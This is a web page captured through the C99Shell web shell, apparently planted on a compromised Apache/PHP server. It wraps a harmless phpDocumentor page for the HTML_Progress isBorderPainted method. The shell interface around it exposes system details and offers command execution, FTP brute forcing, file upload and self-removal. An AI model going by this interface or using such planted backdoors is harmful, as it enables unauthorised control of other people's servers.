!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/HTML_Progress/docs/TDG/HTML_Progress/   drwxr-xr-x
Free 13.06 GB of 61.93 GB (21.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tutorial_progress.isborderpainted.pkg.html (7.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
HTML_Progress::isBorderPainted
HTML_Progress
[ class tree: HTML_Progress ] [ index: HTML_Progress ] [ all elements ]
Prev Next
HTML_Progress::isBorderPainted
determines whether the progress meter border is painted or not

Synopsis

require_once 'HTML/Progress.php';

bool HTML_Progress::isBorderPainted()

Description

This method is used to know whether the progress meter border is painted or not.

Default behavior is progress meter with no border painted. Returns FALSE.

Note

( HTML_Progress >= 1.0 )

This function can not be called statically.

See

HTML_Progress::setBorderPainted

Example

Example below will produced a progress bar with a solid red border.

  1. <?php
  2. require_once 'HTML/Progress.php';
  3.  
  4. $bar = new HTML_Progress();
  5. $bar->setBorderPainted(true);
  6.  
  7. $ui =& $bar->getUI();
  8. $ui->setBorderAttributes(array(
  9. 'width' => 2,
  10. 'style' => 'solid',
  11. 'color' => 'red'
  12. ));
  13. ?>
  14. <!DOCTYPE html
  15. PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  16. "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  17.  
  18. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
  19. <head>
  20. <title>isBorderPainted example </title>
  21. <style type="text/css">
  22. <!--
  23. <?php echo $bar->getStyle(); ?>
  24. // -->
  25. </style>
  26. <body>
  27.  
  28. <?php
  29.  
  30. echo $bar->toHtml();
  31. $test = "\$res = \$bar->isBorderPainted() ? 'yes':'no';";
  32.  
  33. eval($test);
  34. print('border is painted ? ' . $res);
  35. ?>
  36.  
  37. </body>
  38. </html>

Prev Up Next
HTML_Progress::setStringPainted Reference Guide HTML_Progress::setBorderPainted

Documentation generated on Sun, 12 Sep 2004 20:23:09 +0200 by phpDocumentor 1.3.0RC3

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5433 ]--